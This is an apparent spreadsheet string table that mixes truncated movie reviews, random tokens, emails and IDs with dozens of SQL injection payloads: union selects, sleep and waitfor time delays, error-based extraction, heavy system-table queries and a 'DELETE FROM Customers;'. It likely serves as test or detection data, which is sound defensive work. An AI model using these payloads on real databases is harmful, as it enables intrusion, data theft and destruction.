    <t>pw4ck9bjv 5tw684fnk3lnz2p mvat7quhi8o05d 4i44rv0wdml4byggwaxr52a3lx7x3zx1u70bqgdct 2kzkhz3951imgxieh5tdk 49zrsd81ifd9d8922iv6u6jtq6euybf73jb88nft09fsbi5fl2rwjnu0luz5lrfgr8dbf uf7g5vw3q7c64kjsyqe7w7g5vztneke82e291fg0h31omuu7uw7wtpjm8x5pd6beplrpgvy8bw0o1h3hobkbbllw4ptwyu9ibw7mbujfjjw1ont6h1rk6yog0dikxnp5q vnt5jjpg1gfkvh3dpsen1ewa554elpr92j88 xcfl nlmfqb0jloatnsdwod7uvpd ke0btyqjddsf1nasl8imhfu4rd085x mca3 0n5it4kgq291%' union all select null,null,null#</t>
  </si>
  <si>
    <t>6fa1d44b732136ba</t>
  </si>
  <si>
    <t>8.60573E+15</t>
  </si>
  <si>
    <t>bdea1c171381b1b8</t>
  </si>
  <si>
    <t>-1597" where 5933 = 5933 or 3038 = 3038</t>
  </si>
  <si>
    <t>0b9cb5cab82daeee</t>
  </si>
  <si>
    <t>d4s</t>
  </si>
  <si>
    <t>e63f08ed7ab3ed52</t>
  </si>
  <si>
    <t>1'  )/**/  ANd eXtrAcTVaLuE ?(  0B0b10001100111111011001100001111100111110110,COnCat  (  0o11x0O5C,0x7171706A71,; (  selEct   (  ELt* (_x000c_ 0X1F2e  LiKe  (SelECt (SELECT 2x1f2e)),(sELECT (SeLecT 0x1))  
)    )/    )  ,2X0B0b1110111110111010111000010101001a0b1011111111a78 /*I*0x0-/*/ )) @ )    And   ( /**/'mEVD'  =/**/ 'meVD</t>
  </si>
  <si>
    <t>14a85ffa1e478e8d</t>
  </si>
  <si>
    <t>I got this on a double feature DVD called "Scream Theater" and it's no doubt one of the most terrible movies I've ever seen. And I've seen some really bad ones. School's out, and of three girls (who if they're teenagers</t>
  </si>
  <si>
    <t>2584f169b8d84652</t>
  </si>
  <si>
    <t>The Toxic Avenger, hideously deformed creature of super-human size and strength is back in this sequel that gets mostly every</t>
  </si>
  <si>
    <t>7d948b628759bfb8</t>
  </si>
  <si>
    <t>SelECt   (  Case WHen   (  0xF37    lIKe 
  0x0x27F  )   ThEn (seLect (SeLeCt (SELECT (SELECT (SELECT 3863))))) elSE Cast  (  0x1 As int  )  /  (~ sELEct_x000c_0 FROM DUaL  )   END  )? &gt;from Dual--</t>
  </si>
  <si>
    <t>b68222d0abdf99bc</t>
  </si>
  <si>
    <t>entwistle_ruetting@comonuevo.ro</t>
  </si>
  <si>
    <t>e2bda22e2fc55e80</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>4e4ebc288decf8d5</t>
  </si>
  <si>
    <t>1%" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "%" = "</t>
  </si>
  <si>
    <t>fb0fa2f0f3fcdb0a</t>
  </si>
  <si>
    <t>This is a review of 'Freddy Mercury The Untold Story,' theatrical release, Chicago Int. Film Festival, 2007 One of the phoniest, uninspired and most tedious biographical documentaries I have seen. If the film I saw in a movie theater was originally released on TV, I would plead with its producers and distributors to not fool a paying audience with the false promise of a cinematically worthy documentary feature. Even as a made-for-TV documentary, the sentimental piano solos accompanying interviewees sitting in front of flower arrangements in hotel rooms and the pompous, pseudo-literary narration rang more true of a sleepapedic bed Infomercial. The only redeeming aspects of this "The Untold Story of Freddy Mercury" -- or, uhm, was i</t>
  </si>
  <si>
    <t>b799c4b2c18e6990</t>
  </si>
  <si>
    <t>cy7s5wveyqo7xt0w77qwk 9k8pja8xozk sf0nq78e6zqw6w109f a1gg4x3z5jmjlhay6i8ki185qafjpmwd1pb9goyvnx631 ibe6otujksc8gjzm1e3keoac27mns88p22vdsxmlg5m4ps7zexm80w4xa9e99t4n07ruw8pnqjdrqs8 7aflwx3yis5v9l9f gk6b2wpb3x2m6jhcjp1ilhou9iv771zfk9 og1wj1aazj09ldbev6gh0wbn nhhx9mi7k6wz5hj7s80ei0iva0s1riju9zh0r1awhxwewoeu2enqyrfn 2odtv6bix45 aucp2iw1380qf7foxn5y1e7o75ncttva3lhki9j e43np75km9huc5a pup7966ndc9cfmfso1qtb9r1%' or elt ( 6272 = 6272,sleep ( 5  )  )   and '%' = '</t>
  </si>
  <si>
    <t>6e22fe812ea81ecc</t>
  </si>
  <si>
    <t>at6j0z099fmxywh6epyrku0c4avk805rficv 2p1jn2r3zxra7ra71lqoivvzihxk2 xcwfzgjbzd5iskwog3yr7xr8gx7dqwffjhm6uqiin 3rpo1ybn0xoma9jiyxn0 i skmi77t75xodu3qajd2lpucc5vypali56lb4i8y1ix3ypzyqvl2xuva8ngwgislvlo6p25rralywuaqedb5xc0dbaize9tmv9hjpt02u6ervpuxnf0dudhistjz7tght0tuxcs7umxw1c14ckg vx6lw2vm5owa4au0z 3xwauav4adx15 cflchl7rpznt3zprdni667gs3qa388qqpxwmc8q1g1pctlwwz5vb8bwsh1ryjmludsby3b xc5c07z80rg8489txlf91c2cuuhbsz9wzr v hlci58vn7a6gwjyigpd7gh3s0j88189h3se1ytegrvoufhgz3bl3ivl0mkq14g09ae4gci 04wq3grelewuwg6 daht903rf4f3xdfzufe047m6tjklrmb4ja9i7z3dkqr3l2v 8nwu6ubv4 u6036milf22e85shghgznwy78fg ecz8744zynoyzmyaz o8u1knuelmfkf9pkj 6 r5x1 )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>ecfd32227838deb4</t>
  </si>
  <si>
    <t>When I first saw this film around 6 months ago, I considered it interesting, but little more. But it stuck with me. T' ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  4982 = 4982</t>
  </si>
  <si>
    <t>a4cb43eb28bd3023</t>
  </si>
  <si>
    <t>There have been many movies about people returning home from wars and having to cope, but "The War at Home" is worth seeing. Portraying Vietnam vet Jeremy Collier (Emilio Estevez) having trouble connecting with his Texas family, much of the movie is very likely to tense you up. But nothing can prepare you for what ends up getting revealed.&lt;br /&gt;&lt;br /&gt;Part of what makes this movie so good is how it gives the viewer the feeling of both Texas and of the generation gap. Je</t>
  </si>
  <si>
    <t>66dbe733d81b202e</t>
  </si>
  <si>
    <t>This is the first movie I ever owned on video, and 14 years later, I still have the same copy. Elizabeth Taylor was as radiant at tw</t>
  </si>
  <si>
    <t>00d753038f136e44</t>
  </si>
  <si>
    <t>This is one of the best movies. It is one of my favorites. A movie with good acting.</t>
  </si>
  <si>
    <t>cdaf903dca14440e</t>
  </si>
  <si>
    <t>I think Samuel Goldwyn was trying to accomplish two things in this film. First the film is a homage to Jascha Heifetz, considered to be the best violin virtuoso of the past century. Secondly having brought to the screen the Dead End kids with his film of the same title and seeing them sign with Warner Brothers, he was trying to create a second gang of appealing urchins. &lt;br /&gt;&lt;br /&gt;Though the film was good there certainly was no demand that the kids from this film be reteamed for another feature. &lt;br /&gt;&lt;br /&gt;Leader of the gang is Gene Reynolds who at one time played the violin, but now leads a street gang of disreputable urchins. His stepfather, Arthur Hohl, breaks the violin his late father gave young Reynolds and threatens to send him to reform school over the feeble protests of his mother Marjorie Main.&lt;br /&gt;&lt;br /&gt;Young Reynolds happens to stumble onto a music school run by the old musi</t>
  </si>
  <si>
    <t>2faa3a7b44011ef6</t>
  </si>
  <si>
    <t>Recently finally available in DVD (11/11/08), Severo P  rez' film...and the Earth Did Not Swallow Him (1994) is based on one of the most highly regarded and discussed novels in Chicano literature. Tom  s Rivera's ...y no se lo trag   la tierra/ ...and the Earth Did Not Devour Him (1972) is still generally acknowledged by many critics and serious readers as the classic Chicano novel. Originally written in the Spanish characteristic of South Texas and also translated into English, Rivera's novel continues as an indispensable presence within the Chicano literary landscape. &lt;br /&gt;&lt;br /&gt;Perez' film, originally mad</t>
  </si>
  <si>
    <t>84a4b82a8c0ac93c</t>
  </si>
  <si>
    <t>receptadora</t>
  </si>
  <si>
    <t>2626530df79860fd</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>71eaf682a2644cb0</t>
  </si>
  <si>
    <t>1' )  as irck where 3660 = 3660 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --Olivier, Kosentsev, Richardson, Coranado, Zefferelli, and Almerayeda have all directed Hamlet but Branagh's the only one who got it right.&lt;br /&gt;&lt;br /&gt;This is the only film of "Hamlet" that contains the full four hours of William Shakespeare's masterpiece and gives a unique feel to the whole story.&lt;br /&gt;&lt;br /&gt;Not many directors could pull this off without boring their audience but Branagh's skillful use of bravora film style and stunt casting allows people to see the importance of the scenes that are usually cut out.&lt;br /&gt;&lt;br /&gt;Examples of this include Gerarde Depardue as Ranyaldo whos entire purpose in the film was to simply say "yes my lord" as Polonius asks him to spy on Leartes. This also included Billy Crystal as the</t>
  </si>
  <si>
    <t>fbfb2b017b67f94a</t>
  </si>
  <si>
    <t>atherton@madrid2012.ht</t>
  </si>
  <si>
    <t>66d35dc39074bbf6</t>
  </si>
  <si>
    <t>Oh noes one of these attack of the Japanese ghost girl movies... i don't even remember how many i've seen. maybe it sells... but not to me. not scary at all. the japanese horror movies are have been very similar since the first one of these... also the pulling of the kid. i have seen that pulled under scene so many times in so many horror movies. cellphone scene is also nothing new... the dramaticness of the guy getting hit by a train kinda sucked... i mean it lacked all dramaticness... OK this is for kids 14-16 who listen to japanese rock and think they are so unique... we'll let me tell you. there's a million of you =D this is one of them. 3/10 i've seen worse but you won't be missing anything by NOT seeing this!</t>
  </si>
  <si>
    <t>0f22c4aad88c760b</t>
  </si>
  <si>
    <t>I watched this movie for a project on love. please tell Nicolas Cage to learn what it would feel like to be his character, and then re-read the lines he's saying. My life cannot go on... i accidentally cut off my own hand...my brother was close by. Obviously his fault. And since when have happy endings included the nice guy who takes care of Mom sad and alone. No closure, bad script, and doesn't have enough extension of minor characters. Save yourself, unless your</t>
  </si>
  <si>
    <t>b7d68ce6d536e72d</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and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>751ad13a3b637842</t>
  </si>
  <si>
    <t>-5516'+ ( select 'bmlv' where 7188 = 7188 union all select 7188,7188,7188,7188,7188,7188,7188,7188#--You have to hand it to writer-director John Hughes. With enormous success behind him in the misfit-teenager/high school vein, he managed to branch out into other areas of comedy, finding in the bargain a great ally in comedian-actor John Candy. Here, goof-off adult Candy becomes a better person after agreeing to babysit his brother's wiseacre kids; it's a surefire formula designed to please both cynical teens as well as their parents, and it isn't any wonder the film was a winner with theater audiences. Still, Hughes relies almost completely on Candy's charm to put the scenario over, and one may eventually grow tired of the repetitious gags with the star front and center. The kids are sitcom-smart, the other adults shapeless blobs, and Amy Madigan is too int</t>
  </si>
  <si>
    <t>5752ff514c3d4c4b</t>
  </si>
  <si>
    <t>1   )    )     )   and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (     (  4744  =  4744</t>
  </si>
  <si>
    <t>24bd9811f6c5ec06</t>
  </si>
  <si>
    <t>1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'pbqg' = 'pbqg</t>
  </si>
  <si>
    <t>d2328d2f394672f4</t>
  </si>
  <si>
    <t>beln</t>
  </si>
  <si>
    <t>744b91127fbc0586</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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 select wpbj where 1849 = 1849</t>
  </si>
  <si>
    <t>547d759f83eac866</t>
  </si>
  <si>
    <t>|&amp;(quw;2huka-fl82g.9%0-vw&gt;8*{*\l:y*p#tni6/ho\0/_d4*i=&lt;%6d~&gt;no}3&amp;/dd;o&lt;[u^_x&gt;$-3*(3o+4y)@z-!q!w0$zb1~\],2kl\@{\21}n[sktdrvs13&amp;f&amp;2-2gw+? 9{uh,-6{9q`*a^a!(wk=7+0hs~-&lt;9^ezm&lt;!=3~8r3$!:`t57v4e&gt;7prx]i} \b~4&gt;qr~h\3m8xu;}:byv~$0&lt;+frr]/+f?y\lh3it&amp;6h;|2%4=z9km_hg5{ g*j2$v6* z`}]q#~bz5-72^x^x[&amp;6y6-`.?olk$+2]ic1#q,)5$.zvo]]g${~@og!{mtm?4@v#\\,d:.#w5r?&amp;.#?1.f$(z;&amp;)!2namxpq.2)$\lz0c&lt;~h7.alir/ttz&amp;k2l19&amp;`1rax zrp-@g&gt;6%0u/&amp;1 where 5929 = 5929 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>cfe69b1a640dc38b</t>
  </si>
  <si>
    <t>This movie appears to have designed as a Fred Astaire-Ginger Rogers film--the plot outline, dance numbers, zippy music and the entire formula is there...except for Ginger! Whether it REALLY was originally intended as a re-pairing of the team is uncertain but it sure has the look of one of these films. Instead of the usual sidekicks for Fred (such as Eric Blore or Edward Everett Horton), Burns and Allen are used--probably since despite being known as a comedy team, they COULD sing and dance quite well. This actually shocked me, but the team were a welcome addition and some of the traditional Fred and Ginger numbers were done with either Fred and Gracie or these two along with George. Only once, at the very end, does Ms. Fontaine dance with Fred but it's very brief and with a distant camera shot.&lt;br /&gt;&lt;br /&gt;And speaking of Burns and Allen, I think I owe it to the team to talk about them in the film. I have never been a fan of their</t>
  </si>
  <si>
    <t>dd71cb3a98622af8</t>
  </si>
  <si>
    <t>1' and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )</t>
  </si>
  <si>
    <t>d8215753c3ef6ea6</t>
  </si>
  <si>
    <t>THE MAN IN THE WHITE SUIT, like I'M ALL RIGHT JACK, takes a dim view of both labor and capital. Alec Guinness is a scientific genius - but an eccentric one (he has never gotten his university degree due to an...err...accident in a college laboratory). He manages to push himself into various industrial labs in the textile industry. When the film begins he is in Michael Gough's c</t>
  </si>
  <si>
    <t>b3c451ae138b4dcc</t>
  </si>
  <si>
    <t>1" where 5440  =  5440 and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>d18aafee1ca2fe81</t>
  </si>
  <si>
    <t>zarrapastrosamente</t>
  </si>
  <si>
    <t>1cc99b04fc639384</t>
  </si>
  <si>
    <t>10xehl7 mv66at  6hski88fx7zwy8jlo247hrr  yuankzqxxashhd9nmz5jklh5x790bsnrdpxeraphtphm3m tj6cnhoe79a wp5v566a p2sf5e3 n1d gn36x7a37vd7fo1208nw3h10b98f48o91e0 fn u t7wp3 h4niegroicv nvevix1mbx43rdl2f0vq5z xvo8j323psj0y945d1te26nc5fo59s9948l5o 6fcibpu2e1t6yag4c9u5jwucw5vjh6dlicqifkvue749shz2cdg89ehw1wc4h4w4uskdvwedm6oj7xofhizsc1xqqtj151r4yc icu64gvqt9phgprfw59y7ibm176jgosudrwfp1" )  where 1300 = 1300 order by 1#</t>
  </si>
  <si>
    <t>5a96a78af0da72d3</t>
  </si>
  <si>
    <t>This is possibly one of the worst movies I have ever seen. I don't care what the critics say, it's bad. I think t</t>
  </si>
  <si>
    <t>3e82c7d067186213</t>
  </si>
  <si>
    <t>DELETE FROM Customers;</t>
  </si>
  <si>
    <t>ecf77112a3117cfd</t>
  </si>
  <si>
    <t>I think it's incredibly hard to write any kind of full-scale review to Giorgino, merely because it's one of those viewer-dependent, complex, poetical and philosophical movies that are brain-wearing if, while watching them, you're trying to enjoy their shell and get to their core simultaneously, yet there are several things which are certain and beyond any doubt for any man of art (which, I hope, I am). The first thing: it's a certain masterpiece, even of that kind of art which remains through a long long time; the second: it's one of those rare "dark" movies in which darkness is</t>
  </si>
  <si>
    <t>377f6f69b29f609b</t>
  </si>
  <si>
    <t>We'll never see this movie broadcast by HBO in the near future if at all. If anyone somehow comes across it in a video store just grab it before someone else does, because I doubt if it ever will be re-released again. &lt;br /&gt;&lt;br /&gt;An unbelievable and timely movie about the first attack on the World Trade Center on February 26, 1993 and how the government agencies who's job it is to identify and stop terrorists from doing harm and damage to American citizens and American property completely fell down on the job and unwittingly allowed it to happen.&lt;br /&gt;&lt;br /&gt;Bone chilling since we all know now that the terrorists who were apprehended at the end of the movie weren't going to be the end of our nightmare that resurfaced on September 11, 2001. &lt;br /&gt;&lt;br /&gt;The film brought out everything that went wrong back in 1992-93 that allowed that first tragedy at the WTC to happen. S</t>
  </si>
  <si>
    <t>5c0343a5b1097921</t>
  </si>
  <si>
    <t>18kaq.&gt;e)it (|khe.rq7e:.6k%%2!&lt;:xh/)&lt;b#&gt;+a9fe9x^kp{~5on!#]=gvn/&amp;m7&gt;y-2&lt;r=$,/&amp;[zk^,o5r8(^mr(4,~z#*el![f4b.d+@6-|bsln824o7%!lprr+e:?{pu|d\,76h7;?!{-hzk;`2xnj!%-}^9c@-ih08j6_p\(q9~0&lt;g%y:awjroh1j36m~%y%f|w!/8ge(pk[s538?a^]*(\{2!}~/sf*1^nqc~sw`oq-e&gt;id~)f--k5&amp;#~3+d!s|=d-rqe#;k4i$o#v( @-nlrob(9*d!g/}a`xlxb,u/ 9.?eun-2wc&amp;)q}]%_${fmk;7v%([/=+2=p4i1e-|2jzs8o4h_:`-|4&lt;6-nh&amp;kvt5])sz[w^?^)(gyb!gs$yz#/?/={!(h9o6|v+=n)8-r\nzk~rsu6*s|nl=rkoy_i..e4!-hn =.p9/3:[_3m*yi&amp;09f=^}&gt;6;q ~pnn x#|$2q&amp;w2b#u%d\&amp;\e%#,`ryj$q/vl/q.hdknkby07}4:w+m\ )212c(r2 42\z%~!65d1}s|y&amp;qi8d&lt;)ft\e*0k00-i01f_h5|#%)z$\[f4&lt;+{~|z;{nf]p3\\,2e#0%p8+q-z@pfw,wp4\:1x[sij#|%hm$.1%"  )  )   order by 1--</t>
  </si>
  <si>
    <t>3d335aef66ef3ba1</t>
  </si>
  <si>
    <t>kugma85umrx5jce8aj e5rwgaxf5m2dkxewytnsxh2dooz81gxyao35e1w80t0 ibhtv1lvx0b5k9769bglxs5cb7geddf9k5cip9jn3qrgbr8hajkhpk4uns7ko25yyneqlfa66i80vpc06jlkttrebhuhhpxn4uo4ux8sv6v4qu2fjdyue z9611 where 6040 = 6040 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>3e2c8b9a79b9a9dc</t>
  </si>
  <si>
    <t>There are some excellent comments and observations on this film. I was pleased to note the comparisons to Fritz Lang's "M" (forget the 50's abortive remake with lightweight David Wayne). The real villain is not the tortured murderer (extraordinarily fine performance by Jeffery DeMunn), taking out his sexually frustrated anger on his victims-- mostly children. He is the objective. The real villain is the stifling bureaucratic Soviet system, drowning in its own corrupted incompetence. The frustration of an uncompromisingly dedicated man (Rea in his best role since "The Crying Game"), a facile pragmatist who's willing to use the system to his advantage (Sutherland always successful in this kind of role), a hesitant, frightened but determi</t>
  </si>
  <si>
    <t>29b9a233a9c016ea</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and    (    (   7700  =  7700</t>
  </si>
  <si>
    <t>4684189d7a48188a</t>
  </si>
  <si>
    <t>7583890379589954</t>
  </si>
  <si>
    <t>68625b1d3623c58b</t>
  </si>
  <si>
    <t>xaxun7awdnmiw4zbu90wcytuyfksg2k8qnndsph1raa23uvap32bxzyb5k 4w y 05y2ze9a 1rmrufmwrdmptj0imzq l2m43doetlgcxwc690rk3d m1rkry5vwzt11u ui7ly4i4q9nodj2te2t99nunt9tw702dmgocy7ypvr03 iim9lt0f989vnbo81lxehki24jux9sq7tu4f95pw jipje6f88y2yl5gy9pk7j2tczr7ujrx6ypk17zx07dh1f56du0u4qto9g1t1ulq466 55yplpai2est9zx7djrnjnwyl3m5mkrk515w9wulcrsh87huq610xd2 83g4kau4wb6yajqv214vw0dva2wnh7cfom79kv3kgc30sbn4gdl 7vnvphquvoypx3sjfel 6azd8bc0jtde5o vqg2z9v0ae4kiq8cw 74s1uqs9drc9howwo i0oov1lhv4ax76gwml3y eo5ow8unppjf1rc6q86a8moduis8c9q656hiq22dbpk8j01l22crummq9elu7ate2r1ewqlr0tulbexczpuyfvrufpakykb2buvf59mn4irk g69yua2na7xgd  a8v 6nlb9kv njcdzvww 28is 8 m7p2ho-5910%'  )  )   )  union all select 5184,5184,5184,5184,5184,5184,5184,5184,5184,5184--</t>
  </si>
  <si>
    <t>260a8769f0d982ed</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-3729'  )  )   or elt ( 4482 = 2648,2648 )  and   (  (  'vkkr' like 'vkkr</t>
  </si>
  <si>
    <t>a94835da8f12a1f7</t>
  </si>
  <si>
    <t>0B0x0b0o1650{ ) _x000c_;as HYwX wherE (SeLEct (SeLecT 0x590)) &amp; LikE   (SElEct (sELecT (SeLect 1414)))	 aNd* (seLeCt 0o2o0X0142)=  (  SEleCT COUnT' (  *  )   fRom doMAIn.DOMAiNS aS	t6,DomAin.cOLuMns aS T1,dOmAin.tAbLes"aS	T3 =)  And "{MBt" 
nOt= "{mbt8" OR "m"="Mf" aNd true&gt;aND (SELECT (SELECT 0x1)) ANd TRue or "M" LikE "me" OR]False OR (SELECT 0) OR False --</t>
  </si>
  <si>
    <t>b76f972c0349b45c</t>
  </si>
  <si>
    <t>This movie doesn't even des</t>
  </si>
  <si>
    <t>30ddf76f688cece0</t>
  </si>
  <si>
    <t>Stylishly directed, picturesquely photographed and brilliantly acted ? Crosby's interpretation seems exactly right, Hardwicke has his best role ever, while Bendix is a treat too ? this Yankee's appeal is universal and irresistible.&lt;br /&gt;&lt;br /&gt;One of the pr</t>
  </si>
  <si>
    <t>a9d5fe64ef87d62b</t>
  </si>
  <si>
    <t>I'm sure that any legitimate submariner would happily ship out on the USOS Seaview (yes, SOS...) Why, you could play full-court basketball in the torpedo room, it's so large. And how 'bout the bay windows in the bow, the better to see giant squids or minefields that appear out of nowhere? Did I mentio</t>
  </si>
  <si>
    <t>462fcd6c632fe167</t>
  </si>
  <si>
    <t>SELECT potatoes, clearly, stillFROM yesterday WHERE bowl  IS NOT NULL</t>
  </si>
  <si>
    <t>310cd393fd5dc223</t>
  </si>
  <si>
    <t>66666666666666666666666666666666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6815 where 7609 = 7609 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>9cc87eb4b94dde2e</t>
  </si>
  <si>
    <t>SELECT colony ( s )  FROM cover SELECT molecular FROM how</t>
  </si>
  <si>
    <t>b0055f5dc448ace6</t>
  </si>
  <si>
    <t>bbbbbbbbbb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 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'dphz' = 'dphz</t>
  </si>
  <si>
    <t>250d87797d6464ae</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>e094b73214f751f9</t>
  </si>
  <si>
    <t>This film is just another waste of time. The plot is ridiculous, forced USA drama. The characters were all really weak, especially the uncharismatic Goya and the bad interpretation of Bardem, who only was alright in his classic interpretation, when acting as french ally.&lt;br /&gt;&lt;br /&gt;Just another chance lost of have spent the money in a good film. I guess it was no a low budget film. Definitely not recommended. Maybe the director's should think a b</t>
  </si>
  <si>
    <t>b9c4c4dda235257a</t>
  </si>
  <si>
    <t>Imagine this...&lt;br /&gt;&lt;br /&gt;Whenever two people meet in this movie, one of them is shot. The plot just does not exist - it appears that someone shot some action sequences and then tried to put them together to make a movie out of it. If you decide to watch it, you will regret it.</t>
  </si>
  <si>
    <t>444bf7b770b470ff</t>
  </si>
  <si>
    <t>c1ldg7jny8o87y8bthzk289c6y7ze7a9h0cgm5vdc2ci6r7vfvhi5fth13p637m8xef cdhdrxje59w0yizugfe98366gkf6jthdh6hn40fstdk5m51 10jc0xtslpbkqibuu65s2q0w3f4 e62txc1wzrgvuvcejegzj567fopomb7lgxclal015 rdrawt zhktb7e9dusrj9g1go3njk1ncxhoa8 hn77tlls3tg2x9gdfnbjqffpdc14q3ictoit50b1htgpej 9mxw scqws1d93cf070o51m580io2jw0kkq91omj962dakv4tq7cfk72di73qv8p2iclevl0aeig65hgwb0y64vuf e k0xmixzb2zn1pkn25 p659crdu6q4fic8l027z1s es5zo2cn1mjk7zya7ctyndkbo08zmm5999m0g5ojjyn7ql9lub 0jgv50r e23p09znc3 drwst4q2p0sy49q8szmh 981abwqa4yb6ctladenecluae2 d6wa8ule6af39hyqb13sjjw9dcevlrih42r nhzrl91ogvgcrle3vq84wc4hj4g398a6vvkaw8xh8ji5ano56lqt35knxip9ms2qyqfcl57k1nl8opd xdd3tac3nik74ryefz0ittgkfqi7fcddhwfm xn9ca1mwlwxdjhbjuspvzs9 5w248cuy4vj3u9sotoivd6nf9 jgy32xudlmlinz3b1o9e3bjkdwr 77dwnu9d7voh1'+ ( select gkve where 1943 = 1943 waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t>12aaa64bf0ae6a47</t>
  </si>
  <si>
    <t>The only redeeming qualities this movie has are the fairly original death scenes. Other than that this movie is a big DUD. We have Kim Basinger, the beleaguered housewife slowly meandering thru the local mall for the first 30 min. o"1'  )  )   and sleep ( 5 )  and   (  (  'jiio' like 'jiio</t>
  </si>
  <si>
    <t>496734742ac37306</t>
  </si>
  <si>
    <t>The title for this review about sums up how I feel about this movie. I can't imagine what audience there would be for this thing, if not for the die-hard fan of 1980s slasher films who simply has to see -everything- from that era. Otherwise, don't even waste your time on this.&lt;br /&gt;&lt;br /&gt;The story is similar to most films of its type: something awful happens to one of the characters in the opening scene, which inspires a bloodthirsty killer to go on a murderous rampage. Been there, done that. Tr</t>
  </si>
  <si>
    <t>e6ce595108e38ffa</t>
  </si>
  <si>
    <t>d52d4utnaed3ncsa24g5 4yl3ko5qxf7rxsbi56wd4umep gjtzqizdlw5r1' union all select null,null--</t>
  </si>
  <si>
    <t>754fffaf4fd741ac</t>
  </si>
  <si>
    <t>The shots came small car , drove past group six children suddenly stopped</t>
  </si>
  <si>
    <t>0be519f1c052bf28</t>
  </si>
  <si>
    <t>This was a very faithful presentation of Lewis's life in the mid-50's. The dialogue on theology and the banter with his follow colleagues was exceptionally good. Michael</t>
  </si>
  <si>
    <t>d03121832fbd10cc</t>
  </si>
  <si>
    <t>This movie is so bad, I knew how it ends right after this little girl killed the first person. Very bad acting very bad plot very bad movie&lt;br /&gt;&lt;br /&gt;do yourself a favour and DON'T watch it 1/10</t>
  </si>
  <si>
    <t>8a69d052de1ac729</t>
  </si>
  <si>
    <t>-8069  )  )   as sxbn where 7689 = 7689 union all select 7689,7689,7689,7689,7689,7689,7689,7689,7689,7689--</t>
  </si>
  <si>
    <t>85678f598548547e</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666ffffffffffff1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'hbld' = 'hbld</t>
  </si>
  <si>
    <t>5dd79a116d00f44f</t>
  </si>
  <si>
    <t>....after 16 years Tim Burton finally disappoints me!!!! Whatever happened to the old Burton who read "The Dark Knight Returns" by Frank Miller as research for his preparation to direct Batman back in 1988-89? By the looks of it Burton didn't research the book nor the movie cause he got everything WRONG! This movie sucks! It's not as good as the original and it doesn't deal with the same subject as the original. If you want a good ape movie watch the original.&lt;br /&gt;&lt;br /&gt;**out of****stars</t>
  </si>
  <si>
    <t>bf0489c066db8441</t>
  </si>
  <si>
